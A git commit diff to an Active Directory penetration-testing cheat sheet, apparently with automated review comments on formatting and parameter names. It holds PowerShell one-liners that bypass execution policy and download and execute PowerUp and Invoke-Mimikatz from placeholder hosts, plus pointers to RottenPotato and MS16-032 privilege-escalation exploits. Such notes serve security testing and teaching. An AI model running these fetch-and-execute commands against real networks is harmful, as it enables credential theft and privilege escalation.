AD - Little fixes and refactor

patch-1
Swissky 2018-04-28 19:54:32 +02:00
parent cb3b298451
commit 2dcffadd46
1 changed files with 18 additions and 13 deletions

@ -33,6 +33,12 @@
List all GPO for a domain :
Get-GPO -domaine DOMAIN.COM -all
Get-GPOReport -all -reporttype xml --all
or
Powersploit:
Get-NetGPO
Get-NetGPOGroup
```
* Dangerous Built-in Groups Usage
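Review bot: In the GPO listing block, `Get-GPO -domaine DOMAIN.COM -all` uses `-domaine`, which is not a parameter of `Get-GPO` (the parameter is `-Domain`), and the following `Get-GPOReport -all -reporttype xml --all` passes `-all` a second time as `--all`. Since this hunk extends the same block, correct both lines here. The bare `or` and `Powersploit:` lines also sit inside the fenced block as if they were commands; write them as `#` comments so the block reads as PowerShell throughout.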
@ -99,22 +105,21 @@
## Tools
* [Impacket](https://github.com/CoreSecurity/impacket)
* Responder
* Mimikatz
* [Responder](https://github.com/SpiderLabs/Responder)
* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
* [Ranger](https://github.com/funkandwagnalls/ranger)
* BloodHound
* RottenPotato
* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
## PowerSploit
```
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
```
powershell.exe -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks”
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
```
## PrivEsc - Token Impersonation (RottenPotato)
## Privilege Escalation
### PrivEsc - Token Impersonation (RottenPotato)
Binary available at : https://github.com/foxglovesec/RottenPotato
Binary available at : https://github.com/breenmachine/RottenPotatoNG
```c
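Review bot: With the new `## Privilege Escalation` parent heading, the `PrivEsc - ` prefix on `### PrivEsc - Token Impersonation (RottenPotato)` is redundant; drop the prefix from the subsections now that the parent carries it. In the PowerSploit block that moves under the Tools list, the two commands are carried over unchanged, so the first still uses typographic quotes and `10.11.0.47` while the second uses straight quotes and `10.10.10.10`; a refactor commit is the place to settle on one placeholder host and one quote style.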
@ -134,7 +139,7 @@ Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -n
```
## PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
```
Powershell:
https://www.exploit-db.com/exploits/39719/
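Review bot: The retitled heading `### PrivEsc - MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)` keeps the `<` notation, which does not say whether the bounds are inclusive; since the line is being edited anyway, spell the affected range out in words. The exploit-db reference under `Powershell:` is inside the fenced block, where it will not render as a link; moving it above the fence as a normal Markdown link would match the linked entries this commit adds to the Tools list.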